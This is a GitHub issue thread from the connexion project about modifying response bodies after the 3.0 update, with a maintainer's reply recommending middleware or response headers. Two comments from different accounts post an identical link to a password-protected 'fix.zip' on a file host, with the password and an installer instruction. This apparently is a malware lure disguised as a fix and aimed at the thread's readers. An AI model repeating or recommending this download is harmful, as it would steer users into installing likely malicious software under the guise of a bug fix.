### ISSUE TITLE
Best way to modify Response body.

### ISSUE THREAD

**Issue by gaurav-triverus** [spec-first/connexion#1968]
### Description
Is there any equivalent to @flask_app.after_request.
In the previous connexion package I am adding some metadata (having flask.request.path) in every response. 
This was happening at Flask layer. With the updated connexion3.0, it is wotking fine if the request is successful but with the new connexion update custom exception handlers were calling out side the flask context and metadata is missing in those responses.

What is the best way to modify response. I tried it in middleware but then my content-length gets changed and it throws an exception. 

### Additional info:

Output of the commands:

- `python --version`
- `pip show connexion | grep "^Version\:"`

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobbeSneyders** [comment]
If you want to modify the response for all responses, middleware is the way to go, but you'll indeed need to update the `content-length` header to match.

Modifying the body is quite complex though, so I would recommend to put your metadata in the headers instead, which are a lot easier to modify.
